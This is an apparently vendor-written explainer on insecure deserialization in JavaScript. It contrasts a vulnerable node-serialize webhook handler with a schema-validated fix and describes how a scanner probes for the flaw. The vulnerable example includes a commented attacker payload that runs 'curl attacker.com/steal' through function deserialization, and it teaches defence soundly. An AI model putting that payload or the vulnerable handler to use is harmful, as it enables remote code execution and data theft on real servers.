What is Insecure Deserialization?
Serialization turns objects into a format that can be stored or transmitted — JSON, YAML, binary blobs. Deserialization reverses the process. The problem starts when your app deserializes data that came from a user, a cookie, a webhook, or any source an attacker can control.
In the JavaScript ecosystem, the most dangerous pattern is passing untrusted JSON through eval() or using libraries like node-serialize that support function serialization. But even plain JSON.parse() becomes dangerous when the resulting object is used without schema validation — feeding unexpected properties into database queries, auth logic, or template engines.
The core issue is trust. Your app assumes the incoming data has a known shape. The attacker sends data with a different shape — one that triggers unintended behavior when your code processes it.
How does Insecure Deserialization work?
Insecure deserialization requires two things: user-controlled serialized data reaching a deserialization function, and the application processing the resulting object without validating its structure.
Here's a pattern AI commonly generates for processing webhook or session data:
// app/api/webhook/route.ts
import serialize from 'node-serialize';
export async function POST(req) {
const body = await req.text();
// node-serialize can execute functions during deserialization
const data = serialize.unserialize(body);
// Or: eval-based JSON parsing (yes, AI generates this)
// const data = eval('(' + body + ')');
await processEvent(data.type, data.payload);
return Response.json({ received: true });
}
// Attacker sends:
// {"type":"_$$ND_FUNC$$_function(){require('child_process')
// .exec('curl attacker.com/steal?data=...')}()"}import { z } from 'zod';
const webhookSchema = z.object({
type: z.enum(['payment.completed', 'subscription.updated']),
payload: z.object({
id: z.string().uuid(),
amount: z.number().positive().optional(),
status: z.string().max(50),
}),
timestamp: z.string().datetime(),
});
export async function POST(req) {
// JSON.parse is safe — no code execution
let raw: unknown;
try {
raw = await req.json();
} catch {
return Response.json({ error: 'Invalid JSON' }, { status: 400 });
}
// Schema validation strips unexpected fields entirely
const result = webhookSchema.safeParse(raw);
if (!result.success) {
return Response.json({ error: 'Invalid payload' }, { status: 400 });
}
await processEvent(result.data.type, result.data.payload);
return Response.json({ received: true });
}Why do AI tools generate Insecure Deserialization vulnerabilities?
AI code generators focus on getting data in and out of your app. When you ask for a webhook handler, a session parser, or a data import endpoint, the model writes the shortest path from raw input to processed output — and that path often skips validation entirely.
- Dangerous libraries get recommended. Libraries like node-serialize appear in training data and tutorials. AI uses them without understanding that they support function execution during deserialization.
- Schema validation is treated as optional. AI writes JSON.parse() and immediately uses the result. Adding zod or joi validation is an extra step the model skips unless explicitly asked.
- The happy path works perfectly. With well-formed input, the code does exactly what it should. The vulnerability only surfaces when an attacker sends a carefully crafted payload with unexpected structure.
Insecure deserialization is especially dangerous because it can lead directly to remote code execution. A single unvalidated endpoint can give an attacker full control of your server.
Common Insecure Deserialization patterns
eval() for JSON parsing
Using eval('(' + input + ')') instead of JSON.parse(). AI sometimes generates this for "flexibility" with malformed JSON.
Serialized session data in cookies
Storing serialized objects in cookies and deserializing on each request without signature verification or schema checks.
Unvalidated webhook payloads
Parsing incoming webhook JSON and passing fields directly to database queries or business logic without schema validation.
YAML.load() with untrusted input
Using yaml.load() (unsafe by default in many libraries) instead of yaml.safeLoad() to parse user-supplied YAML config files.
How Flowpatrol detects Insecure Deserialization
Flowpatrol tests for insecure deserialization by probing endpoints that accept structured data:
- 1Maps data ingestion endpoints — webhooks, import routes, session handlers, and any endpoint accepting JSON, YAML, or binary payloads.
- 2Sends crafted payloads with prototype pollution keys, function serialization markers, and unexpected nested structures.
- 3Detects dangerous libraries by fingerprinting error messages and response patterns that indicate node-serialize, eval-based parsing, or unsafe YAML loaders.
- 4Verifies schema enforcement — checks whether unexpected fields are stripped or if they pass through to application logic unchanged.
Traditional scanners check for known CVEs in serialization libraries. Flowpatrol tests whether your actual endpoints validate what they receive — because AI-generated handlers rarely do.
Related terms
Check your app for Insecure Deserialization.
Flowpatrol sends crafted payloads to your data endpoints. Know what gets through before an attacker does.
Try it free